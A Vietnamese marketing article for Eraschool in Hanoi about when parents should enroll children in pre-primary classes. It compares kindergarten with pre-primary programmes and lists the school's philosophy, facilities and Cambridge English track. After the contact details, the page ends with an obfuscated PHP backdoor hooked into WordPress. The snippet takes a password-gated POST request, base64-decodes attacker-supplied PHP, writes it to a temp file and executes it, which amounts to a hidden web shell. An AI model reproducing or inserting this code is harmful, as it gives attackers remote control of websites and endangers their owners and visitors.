Khi nào nên đăng ký lớp tiền tiểu học?

post

Học mầm non thôi liệu có đủ để con bắt nhịp với chương trình tiểu học? Nếu muốn đăng ký lớp tiền tiểu học cho trẻ thì thời điểm nào là thích hợp? Đây là những vấn đề đang được rất nhiều ba mẹ quan tâm hiện nay. Để tìm hiểu kỹ hơn về sự khác biệt giữa chương trình mầm non và chương trình tiền tiểu học cũng như địa chỉ dạy tiền tiểu học uy tín, mời ba mẹ cùng dành thời gian theo dõi bài viết dưới đây. 

Bao nhiêu tuổi học được lớp tiền tiểu học?

Từ 5 tuổi, trẻ bắt đầu đủ điều kiện tham gia lớp tiền tiểu học 
Từ 5 tuổi, trẻ bắt đầu đủ điều kiện tham gia lớp tiền tiểu học

Các khóa tiền tiểu học được tổ chức nhằm mục đích giúp trẻ có sự chuẩn bị kỹ lưỡng để nhanh chóng thích nghi với nhịp sinh hoạt và môi trường học mới khi bước vào bậc Tiểu học. Vì vậy, chương trình được thiết kế cho trẻ ở độ tuổi chuẩn bị vào lớp 1 (thường là 5 tuổi) và có sự khác biệt nhất định so với chương trình giáo dục mầm non của Bộ giáo dục và đào tạo. Ba mẹ cũng cần dành nhiều thời gian tìm hiểu trước khi đăng ký lớp tiền tiểu học cho con để đảm bảo con được học chương trình phù hợp, ở độ tuổi phù hợp. 

Sự khác biệt của lớp mầm non và lớp tiền tiểu học?

Lớp tiền tiểu học chú trọng giúp trẻ thích nghi nhanh với môi trường học mới 
Lớp tiền tiểu học chú trọng giúp trẻ thích nghi nhanh với môi trường học mới

Tùy theo định hướng lộ trình học tập tương lai của con mà ba mẹ có thể lựa chọn đăng ký lớp tiền tiểu học hoặc không. Bởi dù cùng được thiết kế cho trẻ ở độ tuổi dưới bậc Tiểu học nhưng giữa lớp mầm non và lớp tiền tiểu học vẫn có sự khác biệt. Cụ thể như sau: 

Lớp mầm non  Lớp tiền tiểu học 
Đối tượng  Dành cho trẻ từ 3-6 tuổi.  Dành cho trẻ từ 5-6 tuổi. 
Thời lượng  – 35 tuần, mỗi tuần 5 ngày. 

– Có các kỳ nghỉ hè, lễ tết, nghỉ học kỳ theo quy định chung của Bộ Giáo dục và Đào tạo. 

– Linh hoạt từ 1 tháng đến 1 năm tùy theo từng trường.
Nội dung khóa học – Giúp trẻ em phát triển về thể chất, tình cảm, trí tuệ, thẩm mỹ; 

– Hình thành và phát triển ở trẻ em những chức năng tâm sinh lý, năng lực và phẩm chất mang tính nền tảng; 

– Phát triển kỹ năng sống phù hợp với lứa tuổi. 

– Chủ yếu giúp trẻ làm quen với môi trường và nhịp sinh hoạt của bậc Tiểu học; 

– Chú trọng phát triển kỹ năng cho trẻ; 

– Giúp trẻ chuẩn bị một số kiến thức cần thiết cho bậc Tiểu học, nhất là với chương trình song ngữ, quốc tế. 

Tại sao nên học lớp tiền tiểu học của Eraschool?

Chương trình học của Eraschool giúp trẻ được phát triển toàn diện 
Chương trình học của Eraschool giúp trẻ được phát triển toàn diện

Nếu lựa chọn đăng ký lớp tiền tiểu học cho con, ba mẹ nên cân nhắc lớp tiền tiểu học của trường phổ thông liên cấp Eraschool vì một số lý do sau: 

  • Triết lý giáo dục 

Triết lý giáo dục của Eraschool luôn dựa trên những tư tưởng giáo dục khai phóng, nhân văn và hiện đại phù hợp với xu hướng phát triển trên thế giới với 2 nội dung chính: 

  • Tự học – Tự giáo dục: Học tập thông qua việc làm, phát triển tư duy phản biện, xây dựng thói quen và đam mê học tập suốt đời. 
  • Tự làm ra chính mình: Học để trưởng thành, sáng tạo và có trách nhiệm. 
  • Cơ sở vật chất 

Eraschool ghi điểm mạnh mẽ với ba mẹ nhờ hệ thống cơ sở vật chất khang trang, hiện đại phù hợp cho việc dạy và học chương trình giáo dục sinh thái theo định hướng giáo dục của nhà trường. Với quan niệm thiên nhiên là môi trường giảng dạy ưu việt cho trẻ, nhà trường không chỉ tập trung trang bị vật tư hiện đại cho các phòng học trong nhà mà còn đầu tư nhiều khu học tập và hoạt động ngoài trời như công viên khoa học, hồ cá Koi, bể bơi, sân bóng nhân tạo,… 

  • Quy tắc tổ chức lớp học 

Các lớp học tại Eraschool luôn được tổ chức theo quy tắc học từ thiên nhiên, học giữa thiên nhiên, phù hợp với mô hình trường học sinh thái mà nhà trường đang theo đuổi. 

  • Chương trình tiếng Anh chuẩn Cambridge 

Eraschool hiện đang triển khai chương trình Cambridge ở cả 2 hệ đào tạo là hệ song ngữ và hệ quốc tế cho bậc Tiểu học và Trung học cơ sở. Vì vậy, các lớp tiền tiểu học tại trường đều được thiết kế nhằm xây dựng nền tảng tiếng Anh căn bản giúp trẻ dễ theo học chương trình hơn. 

Hy vọng những thông tin về chương trình mầm non và chương trình tiền tiểu học trên đây đã giúp ba mẹ có thêm căn cứ để lựa chọn hình thức học tập phù hợp nhất với con. Nếu còn bất cứ thắc mắc nào liên quan đến quá trình đăng ký lớp tiền tiểu học tại Eraschool, ba mẹ vui lòng liên hệ trực tiếp tới hotline của nhà trường để được hỗ trợ nhanh chóng và hiệu quả nhé! 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}